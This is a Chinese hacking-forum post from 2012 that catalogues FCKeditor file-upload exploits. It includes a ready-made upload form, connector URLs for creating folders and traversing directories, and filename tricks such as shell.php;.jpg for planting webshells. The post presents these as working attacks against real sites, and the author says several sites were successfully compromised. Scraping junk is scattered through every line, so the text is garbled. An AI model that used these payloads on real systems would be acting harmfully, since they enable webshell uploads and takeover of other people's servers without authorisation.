找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 Fckeditor漏洞 (2)
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2262|回复: 0
打印 上一主题 下一主题

Fckeditor漏洞 (2)

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-13 17:01:39 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Fckeditor漏洞利用总结  ; s; ]  U) s1 p9 F
查看编辑器版本7 Z8 G8 V& {4 }- O, ~
FCKeditor/_whatsnew.html3 c$ ?, c: ~* n  z$ W1 _0 t, m
—————————————————————————————————————————————————————————————
7 h, Q( y) S0 |  ]( b: F
9 ?% }/ r. v0 W( G7 u4 r0 [2. Version 2.2 版本
9 s( W- Y, Z9 {1 M" cApache+linux 环境下在上传文件后面加个.突破!测试通过。$ s% s2 u5 N, p% T! z9 [9 {- ~
—————————————————————————————————————————————————————————————
# _0 e3 Z3 \# S: o, `0 T3 ~8 y3 O! \* ~
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。0 R! r2 L' w  Y5 z" ]* X: }, W. T  l( l
<form id="frmUpload" enctype="multipart/form-data"7 r6 |# V) u% n1 o2 [2 g
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>5 {( z$ u, L' m6 I8 G5 q4 O
<input type="file" name="NewFile" size="50"><br>/ y4 T9 q5 o9 \- S4 ~, }8 A
<input id="btnUpload" type="submit" value="Upload">3 p% R- P# J1 V! v% W0 B
</form>
* B# d! |: j  _! P: u! t! `4 N$ F—————————————————————————————————————————————————————————————" A8 X2 X, X4 p' R' }3 Y

8 f. G, i1 I( L4 i0 H: P4 Y* }4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
/ O" d& H& G* k$ M# O8 S/ b* ]        很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
% J) }5 B- ^0 ~9 {) }    4.1:提交shell.php+空格绕过) V2 w7 [: V0 j" u  e& P% N
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
! W' I" L! ~9 M4 Z! H9 _" j    4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
6 ^5 F4 A% Z  r+ B—————————————————————————————————————————————————————————————6 l8 b9 X1 I3 e3 }) a( t
! @# z: n' s# O' v# Y/ k6 j
5. 突破建立文件夹, b' b- Z1 K1 a
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
6 y* m" {, j3 }& pFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp5 }! \" F' Y( B5 W5 O
—————————————————————————————————————————————————————————————
3 Q9 {2 ^, _) [* M4 n
+ {; `- a0 o- X1 |9 C6. FCKeditor 中test 文件的上传地址
! `  F$ I0 c, n, a3 g! nFCKeditor/editor/filemanager/browser/default/connectors/test.html$ h2 G4 b/ n! j, @7 n9 f3 n: H% r
FCKeditor/editor/filemanager/upload/test.html
$ M& A  q, ~4 D# QFCKeditor/editor/filemanager/connectors/test.html  U, \% c* N8 }
FCKeditor/editor/filemanager/connectors/uploadtest.html, s% m( m7 e- \5 ]& X7 r
—————————————————————————————————————————————————————————————5 U  R" F* ?$ G- E

$ `+ M5 t; p2 P( P) b+ D# n7.常用上传地址0 M5 Y, v, q0 C8 C" A2 A: M
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
" J& G: U; R1 `. j: k; H# _/ s$ NFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp, b8 B, r: X$ T
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
5 D$ C" e* x( R2 |' j* ~0 U2 PJSP 版:5 r# G, |  F- D# U
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
, ^, {0 `3 R) b注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文4 E1 Y. d+ {3 c8 d6 |9 l( m; ~
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
+ E- I! y- h6 f3 V5 K7 ]! G6 q—————————————————————————————————————————————————————————————
1 X; V" \$ Z3 q# c6 H- x, D3 E9 Y) n# K0 {
8.其他上传地址' M' c6 P9 P8 E; L
FCKeditor/_samples/default.html% Z; A1 w  F* _
FCKeditor/_samples/asp/sample01.asp
3 R: v' ^' W4 R$ v! n% L* BFCKeditor/_samples/asp/sample02.asp/ R8 Y6 U6 v$ D7 ~
FCKeditor/_samples/asp/sample03.asp
/ a0 f+ A3 o' e7 w$ NFCKeditor/_samples/asp/sample04.asp8 L2 V( w0 [! |; W3 m, Y1 |
一般很多站点都已删除_samples 目录,可以试试。* h  u$ D) o4 I2 B* I& _6 O
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。2 r( E+ B. ?) O3 P' I) D
—————————————————————————————————————————————————————————————% {+ e5 N: s& n# g) C
6 d0 ^0 C) J2 G, _! Q
9.列目录漏洞也可助找上传地址
' v! r3 Y6 v2 O$ ~Version 2.4.1 测试通过3 S  J8 k! U; v4 i3 m/ ^
修改CurrentFolder 参数使用 ../../来进入不同的目录
8 _6 f# g* @5 }4 a% |, b) {/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp, S5 q+ m/ i0 N4 X' E
根据返回的XML 信息可以查看网站所有的目录。+ e* z5 V) `7 }
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
3 g" L( B: j4 K, a也可以直接浏览盘符:
7 c  ~$ p% g0 h' C; O/ OJSP 版本:1 g" E# G- `2 A7 g/ g
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
% \! ?' ~$ y  |: R( K! {! j—————————————————————————————————————————————————————————————
1 f2 R! ~! @( h
. R! P- Q( S8 i1 y5 a' M) e$ G10.爆路径漏洞
* H) [0 F4 @1 ^0 E! mFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
& L- D6 ~7 E) r0 U—————————————————————————————————————————————————————————————' y1 @9 S  e! x5 X; T5 ^( r9 z4 j- w& R. v

# e/ `/ C9 M0 @9 K6 o! f11. FCKeditor 被动限制策略所导致的过滤不严问题
0 L1 J4 m1 c! u. T        影响版本: FCKeditor x.x <= FCKeditor v2.4.30 ?8 k1 d) ]8 h; @
脆弱描述:
9 r% o: }* E. d/ q" S4 ~. a! w# S2 ]FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
2 q% a% d7 V' y; ]html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm9 z0 f" e( M' M. k
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
% \# N+ t1 P" o6 J        而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。' h/ Q( R2 }: j$ v8 V9 Q3 V
        在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!5 E% d4 m6 P; o
—————————————————————————————————————————————————————————————
5 @8 b+ k9 q) C
; }. T$ a- u# a12.最古老的漏洞,Type文件没有限制!
6 I' d+ M& y+ z0 c        我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本! , H! [6 m* [/ Q* c
—————————————————————————————————————————————————————————————: I1 g( q4 \& {- L. S& C
  ]5 z0 ~2 P* `0 H$ @' J' E' |2 e) ]
===============================================================================================================================================, h8 Q/ R, D# X$ ?" ]- h
$ ]5 y, R+ @# |# ^
FCK编辑器jsp版本漏洞:6 c+ r' [) c$ L3 o! d/ i5 N3 ?
( S- j& D  _  o* n0 R. a5 q0 n
% H& Q' b' i7 [2 {! H3 N
http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
1 i" S/ Q& g; c+ t! C9 C6 E3 @+ I0 ]8 r( n: s
上传马所在目录% o; u* t& z5 m
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/# J! h/ K7 R; I7 |/ u7 @6 i
上传shell的地址:1 B/ a7 G+ H) l/ {  k
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector  a! O0 n( X- K% \) r
跟版本有关系.并不是百分百成功. 测试成功几个站.) U8 p1 X( B3 d3 Q2 Z; k
不能通杀.很遗憾.
8 G4 j/ [4 R" M. N5 Lhttp://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
) y0 u$ a9 [: d8 y  w如果以上地址不行可以试试
. ^$ `0 b4 H7 T/ x2 _6 v% iFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector8 \, ~  C) Y& \8 o+ c5 t
FCKeditor/_samples/+ u) _* o$ k8 B
FCKeditor/_samples/default.html: N( y, c  Z" V2 t
FCKeditor/editor/fckeditor.htm
/ J: {+ E& j" pFCKeditor/editor/fckdialog.html
; T" {  _2 ?$ q* w) l) h" j" L
% M# z% V3 W2 Z% w! r/ n9 Z8 V; H. x: B  c2 I2 F# x6 i! }; `

$ C, K# E$ j. d! h解析漏洞+未重命名文件时上传漏洞  1.asp;jpg
9 b8 p0 m+ I9 |9 Y1 S4 \, _5 P; C) e
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表